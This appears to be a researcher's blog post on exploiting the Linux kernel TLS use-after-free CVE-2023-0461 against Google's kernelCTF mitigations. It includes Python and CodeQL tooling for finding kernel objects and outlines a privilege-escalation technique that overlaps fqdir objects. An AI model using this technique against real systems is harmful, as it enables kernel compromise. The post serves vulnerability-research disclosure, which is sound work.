In 2023 Google launched a new Vulnerability Reward Program (VRP) called kernelCTF. I was fortunate enough to get first blood by compromising the instance with experimental mitigations.
In this article, after providing a brief overview of the mitigations, I will focus on the process I followed to identify the kernel objects used to compromise the system. Hopefully, this can be useful for those who are new to the field or are just curious about how certain unusual structures end up being utilized in kernel exploits.
The complete technical analysis of the exploit, can be found in the Google Security Research repository.
The Path To Experimental Mitigations
In 2022, I participated to the kCTF Vulnerability Reward Program, and managed to compromise Google’s hardened Kubernetes infrastructure with a novel exploitation technique that can be utilized to perform privilege escalation with a single byte written out-of-bounds.
All the kernel exploits submitted during the year have been collected in the Kernel Exploit Recipes Notebook, a book created by sirdarkcat to document all the different techniques.
Google engineers analyzed all the exploits and developed experimental mitigations with the intent to stop entire classes of attacks. They mainly focused on preventing elastic objects from being easily used to exploit vulnerabilities in the kernel heap, and on preventing cross-cache attacks.
All details about the mitigations can be found in the MITIGATION_README. Here I will provide you with a short description:
-
CONFIG_KMALLOC_SPLIT_VARSIZE
aims to be the elastic object killer by separating dynamic structures from fixed-sized objects. If the size of an object can be determined at compile time, the object is allocated in kmalloc slabs dedicated to fixed-size objects, otherwise, it is allocated in a slab for dynamic objects. As a downside, when objects are separated into multiple caches, slabs tend to be less prone to noise, and this leads to increased exploit stability. Furthermore, if the vulnerable object is allocated in a cache containing dynamic objects, this mitigation actually facilitates the exploitation process. -
CONFIG_SLAB_VIRTUAL
is designed to stop cross-cache attacks. It allocates SLUB objects from a dedicated virtual memory region and ensures that slab virtual memory is never reused for a different slab. Optionally it is also possible to add slab virtual guards between slabs. This protection is very effective, but it does not cover allocations after a certain size, as larger requests (> 8192 bytes), are passed directly to the page allocator.
In 2023, Google launched a new VRP program called kernelCTF, so I decided to participate, utilizing a vulnerability for which I had already written an exploit a short time before.
From UAF To PTSD
Some time before the launch of new VRP, as an exercise, I wrote an exploit for CVE-2023-0461 a Use-After-Free vulnerability caused by a missing check in the ULP subsystem of the Linux kernel, exploitable through the TLS subsystem.
With the original exploit, I was able to perform privilege escalation on multiple Linux distributions with less than 200 lines of code, without requiring a leak or a ROP chain. So when Google launched the new VRP, I thought I could use it to compromise the instance with experimental mitigations.
Unfortunately for me, on the that system, it was a completely different story.
The bug I was trying to exploit, was a Use-After-Free in kmalloc-512
that could easily be turned into a Double-Free. However, the object separation offered by CONFIG_KMALLOC_SPLIT_VARSIZE
completely ruled out my original exploitation strategy, as the vulnerable object and the attacking objects were now allocated in separate caches, and with CONFIG_SLAB_VIRTUAL
enabled, I could not use a cross-cache attack.
I won’t cover one day of failed attempts here, but I will mention that after one more unsuccessful attempt to cause a race condition in kmalloc-512
to overlap two linux_binprm
objects, and use the overlapped binprm->cred
pointers to cause a UAF in cred_jar
, I realized that I was on the right track, I only needed something slightly different.
The pointer overlapping approach was correct, but I needed to overlap two pointers to dynamic structures, making them point to the same object. This would have allowed me to easily transfer exploitation primitives from one cache to another by causing a UAF in the dynamic cache from kmalloc-512
.
Looking For A Structure
Manually analyzing thousands of kernel structures (and nested structures) to find a field that satisfies certain properties can be a tedious task. So at that point, I could proceed in two ways:
-
The 1337 way: Write an advanced object analyzer in Rust integrated with codeQL, capable of extracting structures from vmlinux using the DWARF format and automatically identifying exploitable objects .
-
The lazy way: Use pahole to dump all the kernel structures into a file and extend a Python library I wrote one year earlier to analyze kernel objects.
Aaand of course, I chose the second option: I used pahole to extract all the kernel structures from vmlinux
:
pahole --suppress_aligned_attribute --suppress_packed --suppress_force_paddings --fixup_silly_bitfields --structs vmlinux > kernelctf-mitigation-structs
then, I extended libksp
, a library I coded some time ago, to parse the pahole output and covert raw structures into Python objects. I added a deep_search()
method to the Structure
class to dig into nested structures and look for fields that can satisfy certain conditions:
class Structure:
[...]
def deep_search(self, ksp, path="", offset=0, condition=lambda member: False):
path = self.get_name() if not path else path
for member in self:
current_path = f"{path}.{member.get_name()}"
total_offset = offset + member.get_offset()
if not member.is_ptr() and member.is_struct():
if nested_struct := ksp.get_struct(name=member.get_type_name()):
nested_struct.deep_search(ksp, current_path, total_offset, condition)
elif condition(member):
print(f"Found: {current_path}, Offset: {total_offset}, Type: {member.get_type_name()}")
[...]
At this point I only needed to code a function that returned True
when certain conditions are met (is_ptr_to_dynamic_struct()
), and loop through the structures, calling deep_search()
:
from libksp import KernelStructParser as KSP
ksp = KSP("./kernelctf-mitigation-structs")
structs = ksp.parse_structs()
def is_ptr_to_dynamic_struct(member):
if member.is_ptr() and not member.is_fptr() and member.is_struct():
if struct := ksp.get_struct(name=member.get_type_name()):
if struct.is_dyn():
return True
return False
tls_context = ksp.get_struct(name="tls_context")
tls_context_cache = tls_context.get_cache() # kmalloc-512
for struct in structs:
if not struct.is_dyn() and struct.get_cache() == tls_context_cache:
struct.deep_search(ksp, condition=is_ptr_to_dynamic_struct)
The program returned many findings:
Found: srcu_struct.work.wq, Offset: 368, Type: workqueue_struct
Found: linux_binprm.mm, Offset: 16, Type: mm_struct
Found: bio_set.rescue_list.head, Offset: 320, Type: bio
Found: bio_set.rescue_list.tail, Offset: 328, Type: bio
Found: bio_set.rescue_workqueue, Offset: 368, Type: workqueue_struct
Found: fqdir.rhashtable.tbl, Offset: 64, Type: bucket_table
Found: netdev_queue.qdisc, Offset: 8, Type: Qdisc
Found: netdev_queue.qdisc_sleeping, Offset: 16, Type: Qdisc
Found: netdev_queue.pool, Offset: 120, Type: xsk_buff_pool
Found: kvm_page_track_notifier_head.track_srcu.work.wq, Offset: 368, Type: workqueue_struct
Found: intel_uncore_pmu.boxes, Offset: 352, Type: intel_uncore_box
Found: bpf_offloaded_map.map.kptr_off_tab, Offset: 56, Type: bpf_map_value_off
--- output cut here ---
[...]
One that caught my attention was the bucket_table
pointer in fqdir.rhashtable.tbl
.
Found: fqdir.rhashtable.tbl, Offset: 64, Type: bucket_table
fqdir contains a nested structure, rhashtable, rhashtable
contains a pointer to a bucket_table object, and bucket_table
is allocated in a dynamic cache. Exactly what I was looking for.
Here is the frqdir
structure, followed by the nested structure rhashtable
:
struct fqdir {
long int high_thresh; /* 0 8 */
long int low_thresh; /* 8 8 */
int timeout; /* 16 4 */
int max_dist; /* 20 4 */
struct inet_frags * f; /* 24 8 */
struct net * net; /* 32 8 */
bool dead; /* 40 1 */
struct rhashtable rhashtable; /* 64 136 */
atomic_long_t mem; /* 256 8 */
struct work_struct destroy_work; /* 264 32 */
struct llist_node free_list; /* 296 8 */
/* size: 320, cachelines: 5, members: 11 */
/* sum members: 225, holes: 2, sum holes: 79 */
/* padding: 16 */
};
struct rhashtable {
struct bucket_table * tbl; /* 0 8 */
unsigned int key_len; /* 8 4 */
unsigned int max_elems; /* 12 4 */
struct rhashtable_params p; /* 16 40 */
bool rhlist; /* 56 1 */
struct work_struct run_work; /* 64 32 */
struct mutex mutex; /* 96 32 */
spinlock_t lock; /* 128 4 */
atomic_t nelems; /* 132 4 */
/* size: 136, cachelines: 3, members: 9 */
/* sum members: 129, holes: 1, sum holes: 7 */
/* last cacheline: 8 bytes */
};
And the bucket_table
object, allocated in a dynamic cache (in our case dyn-kmalloc-1k
):
struct bucket_table {
unsigned int size; /* 0 4 */
unsigned int nest; /* 4 4 */
u32 hash_rnd; /* 8 4 */
struct list_head walkers; /* 16 16 */
struct callback_head rcu; /* 32 16 */
struct bucket_table * future_tbl; /* 48 8 */
struct lockdep_map dep_map; /* 56 0 */
struct rhash_lock_head * buckets[]; /* 64 0 */
/* size: 64, cachelines: 1, members: 8 */
/* sum members: 52, holes: 2, sum holes: 12 */
};
At this point I only needed to know how the fqdir
object was allocated, so I used pwnql
a codeQL wrapper I wrote some time ago, to retrieve all the places where the object is allocated by the kernel. The program automatically generated a codeQL query similar to:
import cpp
import utils
Type Deref(Type t) {
result = t.(DerivedType).getBaseType()
}
Type RecursiveDeref(Type t) {
t.getPointerIndirectionLevel() = 0 and result = t or
t.getPointerIndirectionLevel() > 0 and
result = RecursiveDeref(Deref(t))
}
class KmallocFunction extends Function {
KmallocFunction() {
this.getName().regexpMatch("k[^_]*alloc[_a-z]*") or
this.getName().matches("%kmemdup%")
}
}
class KmallocFunctionCall extends FunctionCall {
KmallocFunctionCall() {
this.getTarget() instanceof KmallocFunction
}
}
class StructAllocatedByKmalloc extends Struct {
KmallocFunctionCall kfc;
StructAllocatedByKmalloc() {
this = RecursiveDeref(kfc.getFullyConverted().getType())
}
KmallocFunctionCall getAFunctionCall() {
result = kfc
}
}
from StructAllocatedByKmalloc structure
where structure.getName().matches("%fqdir%")
select structure.getLocation(),
"Struct=" + structure.getName() +
",AllocatedBy=" + structure.getAFunctionCall().getLocation() +
",Size=" + structure.getSize() +
",Cache=" + kmallocSlab(structure.getSize())
then, after executing it, it returned the following result:
❯ pwnql alloc --struct fqdir
[+] Query 1: Search structures allocated by `k[^_]*alloc[_a-z]*` containing "fqdir" in name
[*] Result:
╰─ Struct: fqdir
╰─ AllocatedBy: "https://elixir.bootlin.com/linux/v6.1/source/net/ipv4/inet_fragment.c#L188"
╰─ Size: 320
╰─ Cache: kmalloc-512
And indeed, if we read the net/ipv4/inet_fragment.c source code, we have:
int fqdir_init(struct fqdir **fqdirp, struct inet_frags *f, struct net *net)
{
struct fqdir *fqdir = kzalloc(sizeof(*fqdir), GFP_KERNEL);
int res;
if (!fqdir)
return -ENOMEM;
fqdir->f = f;
fqdir->net = net;
res = rhashtable_init(&fqdir->rhashtable, &fqdir->f->rhash_params);
if (res < 0) {
kfree(fqdir);
return res;
}
refcount_inc(&f->refcnt);
*fqdirp = fqdir;
return 0;
}
After some source code reading, I found that fqdir_init()
is called by ipv4_frags_init_net(), ipv6_frags_init_net() and by netfilter when a new network is initialized. The bucket_table
in the rhashtable
structure is automatically allocated by bucket_table_alloc() when rhashtable_init() is called in fqdir_init()
.
To trigger the fqdir
allocations, it is only necessary to create a new network namespace using unshare(CLONE_NEWNET)
. After after a chain of calls (create_new_namespaces() -> copy_net_ns() -> setup_net()), setup_net()
will initialize all the networks, and fqdir
will be allocated.
At this point, I was able to orchestrate multiple tasks and call unshare(CLONE_NEWNET)
from each of them to allocate multiple fqdir
objects, overlapping two of them in kmalloc-512
to cause a UAF in dyn-kmalloc-1k
, thanks to the overlapped bucket_table
pointers. Finally, I could transfer exploitation primitives from one cache to another, unlock dynamic objects and complete the exploitation process.
All details about the exploit can be found in the Google Security Research repository.
Conclusion
In this brief blog post, I examined how Google’s experimental mitigations work and outlined the process I followed to identify the attacking objects used to compromise their hardened system. While these mitigations represent a significant advancement in kernel security, this analysis shows that vulnerabilities can still be exploited through unconventional approaches.
All the tools mentioned in this article are expected to be open-sourced in the near future.
Cheers!